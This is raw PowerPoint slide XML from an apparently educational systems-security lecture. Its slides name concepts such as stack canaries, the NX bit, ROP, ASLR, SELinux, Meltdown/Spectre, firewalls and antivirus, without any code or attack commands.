              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> not as mature as Java (GC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>observability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>,  etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>Rust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very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>recent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>promising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> langage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>suited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> for time-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> efficient code, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>difficult</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  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well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>suited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>low-level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> IO (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>video</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, network)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  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accepted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> for new Linux Kernel modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3811834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FA039-FF06-C491-356B-E07CFC90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" y="365125"/>
            <a:ext cx="11939587" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>General Protections (by Compiler / Kernel / CPU)  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BufferOverflow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68D3D-A3F9-F598-8A3F-95AD05B4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22" y="2462126"/>
            <a:ext cx="10285611" cy="250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74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93DF-EBA0-8D39-BE34-607F782FC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5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Canary - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Corrupted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A11F0-E7E9-A1FF-1549-7A7D2ACFD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75" y="1346717"/>
            <a:ext cx="8363675" cy="2697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56695-5A7D-13F6-5D25-D7097F8C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947" y="4119448"/>
            <a:ext cx="2427180" cy="2629128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36866" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E06D2A08-59E3-02A6-1A60-9C745A17F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279" y="4119448"/>
            <a:ext cx="1452562" cy="2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22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538A7-B280-81A2-54E9-FB3520A3A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171C-BFB1-BAEC-1610-221831834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81887"/>
            <a:ext cx="11930063" cy="2689888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Device</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Mono User - Mono Process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Security ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>( Isolation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, etc.)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FEF8397-1D80-650D-F997-C6A9F9B51164}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3371636" y="3946123"/>
            <a:ext cx="1041779" cy="4492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40754A-5E2A-8B4D-CE37-47618C24BFAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2603060" y="3518493"/>
            <a:ext cx="153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program Input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F864A2-9E23-5DA9-8F01-4A0F45D90739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4881988" y="3473000"/>
            <a:ext cx="2506639" cy="16695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5" name="Picture 44" descr="Mother Board">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D0FD8C-3BFF-A4BF-2651-C2105B202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6" y="3597178"/>
            <a:ext cx="2228851" cy="1485538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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09256731-5599-DA87-C851-B51A59E8026A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7896011" y="3946122"/>
            <a:ext cx="1041779" cy="4492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71AF7E-BB7D-4D23-3E85-D212CBA51ABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7864663" y="347300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311576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76D5-2643-DB13-8EA7-4324C6C1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Bound Checking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F5D3A-7B4E-667B-9483-B2D5A24D3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62" y="2396400"/>
            <a:ext cx="8363675" cy="20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65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2CDF-3B7E-6378-4DAF-26925F22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0"/>
            <a:ext cx="11730037" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Tagging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Page  -  Read/Write Data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EDB06-4F39-21D3-12B2-8B6C737C3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949" y="1114425"/>
            <a:ext cx="9044529" cy="2409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72D6C1-A4D2-42C2-B240-B0856CEF8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262" y="3991869"/>
            <a:ext cx="8769488" cy="270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1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3167-3E80-886B-ED8F-1E6D7A2CB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94"/>
            <a:ext cx="10515600" cy="963620"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Measures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to NX (No-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) Bit ...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DA9F3-823B-5CB6-A47B-B76DC3EE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2" y="904875"/>
            <a:ext cx="5643790" cy="520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9945D-994D-1BE5-EC56-0219D99CF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5" y="1080865"/>
            <a:ext cx="5777135" cy="577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994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0402-ADB1-0975-5EC9-4172DD303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44675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ROP  (Return-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Oriented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Programming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 err="1"/>
              <a:t>assemblying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "gadgets"  or "code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37890" name="Picture 2" descr="Typical return-oriented programming (ROP) attack. | Download Scientific  Diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A0BF91-34B5-316C-1971-5C34810F3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2" y="2424673"/>
            <a:ext cx="5629275" cy="430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365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36BE9-46C2-6AB3-FD6D-ADBC6D59B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Counter - Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Measures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to ROP :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ASLR  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Address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Layout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42D66-15CF-4490-324C-26720EE92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02" y="2759825"/>
            <a:ext cx="10417600" cy="24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85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49E7-C9AF-047F-5F1C-BAB3E6A18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ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38914" name="Picture 2" descr="Early Security Stories — ASLR. Story time. This one is about a feature… |  by John Lambert | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D6C80A7-1C9E-D1D7-3E8F-3A58F93AB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8475"/>
            <a:ext cx="12192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7C60-EF92-0D29-F4F4-F2D8E7B1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1"/>
            <a:ext cx="11029950" cy="1047750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Counter - Counter - Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Measures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to ASLR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83C36-97F6-5292-1597-F1264B5D8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2" y="887759"/>
            <a:ext cx="6005212" cy="4912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62CE8-CBB7-964D-AA40-0F021D109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887759"/>
            <a:ext cx="5599967" cy="587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773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EDDD-0797-74DD-8C4F-DBD29B311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81076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>in Linux?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0274D-2DE9-40CE-11E5-C92F814E9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3" y="710355"/>
            <a:ext cx="5774476" cy="5299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A95D7A-C281-BA38-12AB-7DE51D70E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750210"/>
            <a:ext cx="5729507" cy="598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36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3E5E-1D6B-1774-8D2F-D7EB7EE28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13"/>
            <a:ext cx="10515600" cy="1019175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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B48A2-CE8B-3D5D-8D69-761FDEA5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940"/>
            <a:ext cx="6085463" cy="4515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00505-8B7E-4ABF-5B9B-CAC6E0254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128" y="1190455"/>
            <a:ext cx="5953041" cy="551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64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F1E67-D682-8EB9-E48A-8B9C34041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B22B1-BC96-09DE-8D50-96E4B8C1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Last but Not Least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://meltdownattack.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45060" name="Picture 4" descr="Meltdown and Spectre. Is this the end of the world as we know it?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E174D0-0B79-1567-CEE0-9C85ADAB8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87" y="2176463"/>
            <a:ext cx="571500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31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3C8E8-C824-42F9-949D-4C1F3D4EB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5353-CD69-E898-7797-C13AB1DE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365125"/>
            <a:ext cx="11911013" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Web Servers: Client - Https Servers </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>= Open to Internet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6C010-AE9B-9198-390A-F3C74A8F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78" y="1781015"/>
            <a:ext cx="6969094" cy="3696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E8CF88-23E3-DF0E-F3E3-30DEDCC3D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672" y="2801173"/>
            <a:ext cx="3837003" cy="29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709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6659A-0CE3-30C9-B13E-84A2B42F2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E258D-7759-F5EB-3742-A226684F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7" y="365125"/>
            <a:ext cx="11863387" cy="1539875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>All Modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>CPUs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Impacted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> !!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46084" name="Picture 4" descr="Meltdown and Spectre : CPU vulnerabilities — Explained and Exploited | by  Mondher Smii | secjuice™ | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B42BFDE-1520-27E0-03E0-46A76E84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042" y="2262188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 descr="Guide] How to Protect Your Devices Against Meltdown and Spectre Attacks">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A0F985-6FF0-F805-0E33-1CC318426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291" y="4171951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6" name="Picture 2" descr="Meltdown and Spectre">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BB59CC-8068-9FA3-DF89-D97654053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5" y="4386263"/>
            <a:ext cx="4824478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0014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09A13-0FEC-46E6-8909-1EC533A55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43013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Impacts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>= Reading FULL Memory of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>processes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AF6F6-06F1-1976-6F38-9B1AE900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8" y="1488971"/>
            <a:ext cx="6781186" cy="524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857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837F0-ED02-0AF8-8168-25B8D556C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561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Demo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42607-641A-1D0A-9152-CA21CDB90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478" y="1401173"/>
            <a:ext cx="8435043" cy="52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595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EDDC1-67DE-8ADF-C04E-D95054603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6"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Premature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>optimization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> the root of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>evil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DC43B6-0AC7-74E3-8AFF-60070B4D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39" y="1046087"/>
            <a:ext cx="5461124" cy="3778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895FCC-6E55-C53C-AE29-1C7CCD15F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79" y="5149360"/>
            <a:ext cx="7392041" cy="14288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E0B609-7F63-2277-3B79-73B439E848BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7553325" y="4886326"/>
            <a:ext cx="4320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https://en.wikipedia.org/wiki/Turing_Award</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25907312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6800E-639D-B9F5-1597-2E49CA853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Cache Miss ?  &amp;   Page Protection Check ?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>OpCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Reordering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DA592-46F6-F99C-2DD5-91068C90E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423" y="2486895"/>
            <a:ext cx="4543539" cy="3272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94BD05-2A63-5FC8-C358-DF6657418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290" y="2101028"/>
            <a:ext cx="2895851" cy="43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656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11B0B-5186-0321-3F97-FA407ABD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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-Channel"  Attack, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Time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7EC7F-985D-5FFA-6EA6-01E4A265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441" y="2500259"/>
            <a:ext cx="4712426" cy="226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790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7F67B-EF99-6837-8A23-DAB78B67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7" y="1989138"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Intermediate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Conclusion on System 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4D0E0-96F2-B853-3F5C-E06B26489496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086100" y="3705225"/>
            <a:ext cx="68150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Domain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Complex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Extremely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> active battle </a:t>
            </a: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WhiteHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>BlackHat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Don't </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>under-estimate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053439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58D1-8EC3-3150-6BB3-A453EA647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6749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Adding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Layers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>in the Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="486957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9325B-68B2-056C-F344-30C42A66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Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exposed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to Fire... </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Put "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>FireWall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>" Protection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C224-B44E-9790-5600-2BFF40D6C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25" y="2566851"/>
            <a:ext cx="9525825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741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FDD9-A594-2E78-A34A-3C95AE1C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Is That all ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24578" name="Picture 2" descr="What Is Firewall: Types, How Does It Work &amp; Advantages | Simplilearn">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFCC399-93B8-B57F-9E42-7DEA59976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2" y="1909762"/>
            <a:ext cx="97155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819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89186-1320-402F-C327-794BD3AE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Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Threats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6D010-AB4D-DD22-8C6A-F808C643F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2" y="1009483"/>
            <a:ext cx="6408109" cy="4676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DA34E-CA93-0F12-3C37-9CA2699EF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909" y="2495551"/>
            <a:ext cx="5739320" cy="42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943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E7809-00A9-8F19-EDD4-11FA20D58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809"/>
            <a:ext cx="10515600" cy="1195642"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Put An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>AntiVirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>,   Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> all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78DAF-7E89-06CB-CD71-DD4F4163E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1675064"/>
            <a:ext cx="7858531" cy="493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15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E2FA9-F642-9384-42FD-574519DC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Web App Server - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Tiered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Infrastructure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
